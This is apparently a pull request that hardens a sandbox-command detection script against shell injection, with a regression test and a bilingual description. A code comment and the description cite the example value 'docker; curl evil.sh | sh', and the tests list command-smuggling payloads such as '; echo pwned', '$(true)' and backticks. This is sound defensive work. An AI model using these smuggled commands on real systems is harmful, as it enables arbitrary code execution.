### PR TITLE
fix(scripts): avoid shell injection in sandbox command detection

### DIFF
--- a/scripts/sandbox_command.js
+++ b/scripts/sandbox_command.js
@@ -17,7 +17,7 @@
 // See the License for the specific language governing permissions and
 // limitations under the License.
 
-import { execSync } from 'node:child_process';
+import { execFileSync } from 'node:child_process';
 import { existsSync, readFileSync } from 'node:fs';
 import path from 'node:path';
 const { join, dirname } = path;
@@ -95,16 +95,31 @@ if (!qwenSandbox) {
 qwenSandbox = (qwenSandbox || '').toLowerCase();
 
 const commandExists = (cmd) => {
-  // Use 'where.exe' (not 'where') on Windows because PowerShell aliases
-  // 'where' to 'Where-Object', which breaks command detection.
-  const checkCommand = os.platform() === 'win32' ? 'where.exe' : 'command -v';
+  // Pass `cmd` as a separate argv element (never interpolated into a shell
+  // command string) so a malicious QWEN_SANDBOX value such as
+  // `docker; curl evil.sh | sh` cannot inject extra commands.
+  const check = (candidate) => {
+    if (os.platform() === 'win32') {
+      // Use 'where.exe' (not 'where') because PowerShell aliases 'where' to
+      // 'Where-Object', which breaks command detection.
+      execFileSync('where.exe', [candidate], { stdio: 'ignore' });
+    } else {
+      // 'command -v' is a POSIX shell builtin, so it must run inside a shell.
+      // Bind the candidate to $1 rather than splicing it into the script text.
+      // Use an absolute '/bin/sh' (matching execSync's default) so a
+      // PATH-controlled 'sh' from an untrusted project cannot be run here.
+      execFileSync('/bin/sh', ['-c', 'command -v "$1"', 'sh', candidate], {
+        stdio: 'ignore',
+      });
+    }
+  };
   try {
-    execSync(`${checkCommand} ${cmd}`, { stdio: 'ignore' });
+    check(cmd);
     return true;
   } catch {
     if (os.platform() === 'win32' && !cmd.endsWith('.exe')) {
       try {
-        execSync(`${checkCommand} ${cmd}.exe`, { stdio: 'ignore' });
+        check(`${cmd}.exe`);
         return true;
       } catch {
         return false;

--- a/scripts/tests/sandbox-command.test.js
+++ b/scripts/tests/sandbox-command.test.js
@@ -1,0 +1,72 @@
+/**
+ * @license
+ * Copyright 2026 Qwen Team
+ * SPDX-License-Identifier: Apache-2.0
+ */
+
+import { execFileSync } from 'node:child_process';
+import { fileURLToPath } from 'node:url';
+import path from 'node:path';
+import { describe, expect, it } from 'vitest';
+
+const scriptPath = path.join(
+  path.dirname(fileURLToPath(import.meta.url)),
+  '..',
+  'sandbox_command.js',
+);
+
+/**
+ * Runs sandbox_command.js as a subprocess with the given QWEN_SANDBOX value.
+ * Returns { status, stdout, stderr }. Never throws on a non-zero exit so the
+ * caller can assert on the exit code.
+ */
+function runSandboxCommand(sandboxValue) {
+  try {
+    const stdout = execFileSync(process.execPath, [scriptPath, '-q'], {
+      encoding: 'utf8',
+      env: { ...process.env, QWEN_SANDBOX: sandboxValue },
+    });
+    return { status: 0, stdout, stderr: '' };
+  } catch (err) {
+    return {
+      status: err.status ?? 1,
+      stdout: err.stdout?.toString() ?? '',
+      stderr: err.stderr?.toString() ?? '',
+    };
+  }
+}
+
+describe('sandbox_command.js QWEN_SANDBOX handling', () => {
+  // Each payload appends a command that would exit 0 if the shell ever split
+  // the value on the metacharacter. A vulnerable build runs e.g.
+  // `command -v doesnotexist; true`, which exits 0, so commandExists() returns
+  // true and the script echoes the payload and exits 0. The hardened build
+  // treats the whole string as a single command name, fails to find it, and
+  // exits non-zero — so a regression here flips these assertions.
+  const injectionPayloads = [
+    'doesnotexist; true',
+    'doesnotexist && true',
+    'doesnotexist | true',
+    'doesnotexist; echo pwned',
+    '$(true)',
+    '`true`',
+  ];
+
+  for (const payload of injectionPayloads) {
+    it(`rejects the injection payload ${JSON.stringify(payload)} instead of executing it`, () => {
+      const { status, stdout } = runSandboxCommand(payload);
+      expect(status).not.toBe(0);
+      // The payload must never be accepted as a resolved sandbox command.
+      expect(stdout.trim()).toBe('');
+    });
+  }
+
+  it('reports the raw value as a single missing command (no shell splitting)', () => {
+    const payload = 'doesnotexist; echo pwned';
+    const { status, stderr } = runSandboxCommand(payload);
+    expect(status).not.toBe(0);
+    // The entire string is echoed back verbatim, proving it was treated as one
+    // opaque command name rather than parsed by a shell.
+    expect(stderr).toContain(`missing sandbox command '${payload}'`);
+  });
+});


### PR DESCRIPTION
## What this PR does

Hardens the sandbox-command detection helper so a maliciously crafted sandbox value can no longer inject extra shell commands while checking whether the command exists. The candidate is now passed as a separate process argument instead of being spliced into a shell string, and the POSIX lookup runs through an absolute shell path.

## Why it's needed

The helper decided whether the configured sandbox command exists by building a shell string like `command -v <value>` and executing it. A value such as `docker; curl evil.sh | sh` — coming from the environment, user settings, or a project-level `.env` — would run the trailing command. This helper runs at dev/build time (`npm start`, `npm run build`), not in the shipped CLI (which already validates against an allowlist and does a shell-free lookup), so real-world exploitability is low. Even so, executing an attacker-influenced string through a shell in the sandbox-setup path is worth closing as defense-in-depth. The earlier approach also risked invoking a PATH-controlled shell, which the absolute shell path now prevents.

## Reviewer Test Plan

### How to verify

- Injection is neutralized: `QWEN_SANDBOX='doesnotexist; touch /tmp/pwned' node scripts/sandbox_command.js -q` → prints `ERROR: missing sandbox command 'doesnotexist; touch /tmp/pwned'`, exits non-zero, and `/tmp/pwned` is **not** created. Other shapes behave the same: `&&`, `|`, `$(...)`, and backticks.
- Normal detection still works: `QWEN_SANDBOX=docker node scripts/sandbox_command.js` prints `docker`; with no variable set on macOS it prints `sandbox-exec`.
- Regression test: `npx vitest run --project scripts scripts/tests/sandbox-command.test.js` → 7 passed.

### Evidence (Before & After)

Before: the trailing command in the payload executed (marker file created) and the malicious string was accepted as the sandbox command (exit 0).

After: the entire value is treated as a single command name, rejected as missing (exit non-zero), and no injected command runs.

| Scenario | Command | Before | After |
| --- | --- | --- | --- |
| Injection `; touch` | `QWEN_SANDBOX='x; touch /tmp/pwned' node scripts/sandbox_command.js -q` | `/tmp/pwned` created | rejected, no file |
| Normal detect | `QWEN_SANDBOX=docker node scripts/sandbox_command.js` | `docker` | `docker` |
| Default (macOS) | `node scripts/sandbox_command.js` | `sandbox-exec` | `sandbox-exec` |
| Regression test | `vitest run scripts/tests/sandbox-command.test.js` | (new) | 7 passed |

### Tested on

|     OS     | Status |
| :--------: | :----: |
|  🍏 macOS  |   ✅   |
| 🪟 Windows |   ⚠️   |
|  🐧 Linux  |   ⚠️   |

Windows/Linux rely on CI; the POSIX code path is shared between macOS and Linux.

### Environment (optional)

Local `node scripts/sandbox_command.js` runs plus the `scripts` vitest project.

## Risk & Scope

- Main risk or tradeoff: none behavioral — the same set of sandbox commands is accepted; only the existence-check mechanism changed.
- Not validated / out of scope: the Windows `where.exe` path is left unchanged; this helper still does not adopt the shipped CLI's `docker`/`podman`/`sandbox-exec` allowlist.
- Breaking changes / migration notes: none.

## Linked Issues

Reported privately; no public issue to link.

<details>
<summary>中文说明</summary>

## 本 PR 做了什么

加固沙箱命令检测辅助脚本，使得恶意构造的沙箱值在检测命令是否存在时无法再注入额外的 shell 命令。现在候选命令作为独立的进程参数传入，而不是拼接进 shell 字符串；POSIX 下的检测通过绝对路径的 shell 执行。

## 为什么需要

该脚本此前通过拼接 `command -v <值>` 这样的 shell 字符串并执行，来判断配置的沙箱命令是否存在。像 `docker; curl evil.sh | sh` 这样的值（来自环境变量、用户设置或项目级 `.env`）会执行后半段命令。该脚本运行在开发/构建阶段（`npm start`、`npm run build`），并非发布的 CLI（发布版已使用白名单校验且不经过 shell 查找），因此真实可利用性较低。即便如此，在沙箱初始化路径上把受攻击者影响的字符串交给 shell 执行，仍值得作为纵深防御修复。此前的写法还存在调用受 PATH 控制的 shell 的风险，改用绝对 shell 路径后已规避。

## 验证方式

- 注入被阻断：`QWEN_SANDBOX='doesnotexist; touch /tmp/pwned' node scripts/sandbox_command.js -q` 会打印 `ERROR: missing sandbox command ...`，以非零码退出，且不会创建 `/tmp/pwned`。`&&`、`|`、`$(...)`、反引号等形式同理。
- 正常检测不受影响：`QWEN_SANDBOX=docker node scripts/sandbox_command.js` 输出 `docker`；macOS 下不设变量时输出 `sandbox-exec`。
- 回归测试：`npx vitest run --project scripts scripts/tests/sandbox-command.test.js` → 7 通过。

## 风险与范围

- 无行为变化：接受的沙箱命令集合不变，仅检测机制改变。
- 范围之外：Windows 的 `where.exe` 路径保持不变；该脚本仍未采用发布版 CLI 的 `docker`/`podman`/`sandbox-exec` 白名单。
- 无破坏性变更。

</details>
